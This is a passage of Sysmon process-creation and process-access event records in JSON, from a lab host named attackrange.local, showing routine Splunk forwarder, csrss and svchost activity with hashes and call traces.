MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:01:56.654","ProcessGuid":"{E2A3D6B1-1364-5F25-0000-0010E56D0E00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:01:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8220,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:56.654\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1352-5F25-0000-0010DA120E00}\r\nTargetProcessId: 2464\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:56.654","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1352-5F25-0000-0010DA120E00}","TargetProcessId":"2464","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8221,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:56.654\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1352-5F25-0000-0010DA120E00}\r\nTargetProcessId: 2464\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:56.654","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1352-5F25-0000-0010DA120E00}","TargetProcessId":"2464","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8222,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:56.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:56.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8223,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:56.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:56.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8224,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:56.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:56.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8225,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:56.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:56.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8226,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:56.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:56.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8227,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:56.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 